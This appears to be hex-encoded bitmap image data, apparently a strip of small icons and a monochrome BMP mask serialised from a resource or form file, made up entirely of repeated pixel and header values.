ffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060606060a0a0a0a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060606060ffffffff60606060000000000000000030303030868686869999999999999999999999999999999999999999999999999999999999999999babababaffffffff60606060303030300a0a0a0a3c3c3c3c9e9e9e9e9999999999999999999999999999999999999999999999999999999999999999babababaffffffff606060603a3a3a3a999999996b6b6b6b464646467d7d7d7d8c8c8c8ca6a6a6a69999999999999999999999999999999999999999babababaffffffff606060603a3a3a3aa6a6a6a69b9b9b9b7d7d7d7d6666666666666666666666666c6c6c6c8c8c8c8c9b9b9b9b9b9b9b9b99999999babababaffffffff60606060404040409f9f9f9f8e8e8e8e808080808080808066666666666666666666666666666666666666666666666684848484b7b7b7b7ffffffff606060603030303097979797808080808080808080808080787878785a5a5a5a66666666666666666666666666666666666666669c9c9c9cffffffff606060602626262687878787808080808080808080808080808080802828282820202020666666666666666666666666666666669c9c9c9cffffffff606060601d1d1d1d4d4d4d4d535353536a6a6a6a6b6b6b6b40404040101010100000000000000000202020205a5a5a5a69696969a0a0a0a0ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d3a3a3a3a00000000000000000000000000000000000000000000000063636363ffffffff606060601d1d1d1d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d484848480e0e0e0e000000000000000000000000000000000000000060606060ffffffff606060600a0a0a0a4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d444444440e0e0e0e000000000000000000000000000000000000000000000000a0a0a0a06060606000000000000000000000000013131313131313130e0e0e0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000056565678888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c33333348888888bf6f6f6f9b2b2b2b3c888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf6a6a6a953737374d888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf808080b4888888bf888888bf808080b30909090c6c6c6c97888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf787878a8111111186f6f6f9c888888bf888888bf5e5e5e831010101711111118888888bf888888bf888888bf888888bf888888bf888888bf888888bf888888bf4d4d4d6c000000000909090c4d4d4d6c888888bf888888bf888888bf101010176363638b888888bf888888bf888888bf828282b65c5c5c81696969934545456000000000000000000000000011111118888888bf888888bf888888bf6f6f6f9b0808080b4242425d4f4f4f6e4c4c4c6b111111182222222f1515151e000000000000000000000000000000000000000067676790888888bf888888bf888888bf838383b96a6a6a956666668f6666668f777777a7888888bf3c3c3c5400000000000000000000000000000000000000000909090c565656786767679056565678808080b4888888bf888888bf888888bf888888bf808080b40909090c0000000000000000000000000000000000000000000000000000000000000000000000001a1a1a24787878a8888888bf888888bf676767901a1a1a240000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf30303030000000000000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef30303030000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8fffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff30303030000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbfffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040dfdfdfdf0000000020202020ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000010101010ffffffff0000000000000000ffffffff0000000000000000ffffffffffffffff00000000000000000000000000000000ffffffff000000000000000070707070afafafaf0000000040404040cfcfcfcf0000000020202020ffffffffffffffffffffffffffffffff6060606000000000ffffffff0000000000000000ffffffff40404040000000009f9f9f9f8f8f8f8f0000000050505050bfbfbfbf000000000000000060606060ffffffff60606060ffffffff0000000000000000000000000000000060606060efefefef10101010000000008f8f8f8f8f8f8f8f00000000000000000000000060606060ffffffffffffffff00000000000000000000000000000000ffffffff505050500000000010101010efefefef303030300000000000000000000000000000000060606060ffffffff0000000000000000000000000000000000000000000000000000000080808080bfbfbfbf0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000dfdfdfdf303030300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffff000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000000000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000ffffffff000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff00000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000424d3e000000000000003e0000002800000010000000400200000100010000000000000900000000000000000000000000000000000000000000ffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007fe000077fe000057fe000007fe000077fe000000000000ffff0000ffff0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000f0410000c00000008190000093800000138400000000000033c1000077fe000077ee000033cc00000000000013c8000093c9000081810000c0030000f00f0000ffff0000fff90000f3f90000e3c80000c3c400000b2400007b2400007b3600007b3600007b2400000b240000c3c40000e3c80000f3f90000fff90000ffff0000ffff0000d80f0000df7f0000df7f0000c0000000dffe0000dffe0000dffe000007f